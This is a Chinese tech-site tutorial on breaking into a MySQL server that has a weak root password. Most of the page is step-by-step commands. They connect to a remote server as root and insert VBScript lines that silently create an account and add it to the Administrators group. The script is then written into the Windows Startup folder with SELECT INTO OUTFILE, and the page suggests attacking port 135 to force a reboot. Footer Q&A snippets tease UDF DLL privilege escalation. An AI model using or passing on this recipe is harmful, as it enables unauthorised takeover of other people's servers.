MySQL用户Root密码为弱口令的攻击

欢迎您访问我爱IT技术网，今天小编为你分享的编程技术是：【MySQL用户Root密码为弱口令的攻击】，下面是详细的分享！

MySQL用户Root密码为弱口令的攻击

1、连接到对方MYSQL 服务器

mysql -u root -h 192.168.0.1

mysql.exe 这个程序在你安装了MYSQL的的BIN目录中。

2、让我们来看看服务器中有些什么数据库

mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库，如果你看到有其它的数据库那么就是用户自建的数据库。

3、让我们进入数据库

mysql>use test; 我们将会进入test数据库中。

4、查看我们进入数据库中有些什么数据表

mysql>show tables; 默认的情况下，test中没有任何表的存在。

以下为关键的部分

5、在TEST数据库下创建一个新的表；

mysql>create table a (cmd text); 好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。

6、在表中插入内容

mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );

mysql>insert into a values

("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );

注意双引号和括号以及后面的"0"一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！ 　7、好了，现在我们来看看表a中有些什么

mysql>select * from a;我们将会看到表中有三行数据，就是我们刚刚输入的内容，确认你输入的内容无误后，我们来到下一步

8、输出表为一个VBS的脚本文件

mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\“开始”菜单\\程序\\启动\\a.vbs"; 我们把我们表中的内容输入到启动组中，是一个VBS的脚本文件！注意"\"符号。

9、看到这大家肯定知道了，就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢，因为启动运行时会有明显的DOS窗口出来，而用VBS脚本则可以完全隐藏窗口且不会有错误提示！本来，应该还有一句完成脚本后自动删除此脚本的，但是中文目录实在无法处理，只有作罢！好了，找个工具攻击135让服务器重启吧，几分钟以后你就是管理员了。

以上所分享的是关于MySQL用户Root密码为弱口令的攻击，下面是编辑为你推荐的有价值的用户互动：

　　相关问题：如何利用弱口令入侵MySQL数据库

　　答：很早网上就有了用mysql弱口令得到webshell教程，但是这次我要说的不是得到webshell，而是直接得到系统权限，看清楚了，是“直接”得到！ 首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上传udf dll文件，然后利用注册UDF DL... >>详细

　　相关问题：mysql数据库root用户密码忘记了

　　答：参考：http://www.jb51.net/article/21984.htm 具体要看你是在什么系统(windows或者是linux)下面的mysql了，一般来说，方法就是开不安全模式进入mysql，然后直接修改mysql数据库下面的user表，记得update user set password=password("新密码") ... >>详细

　　相关问题：mysql root 密码多少位

　　答：本文提供一个在数据库服务器上修改root密码的方法，本文撰写基础是在xp操作系统下进行。第一步 登录数据库服务器 采用具有Admin权限的用户名登录到服务器；第二步 关闭MySQL服务 在控件面板->管理工具 双击服务，在弹出页面中找到MySQL服务。单... >>详细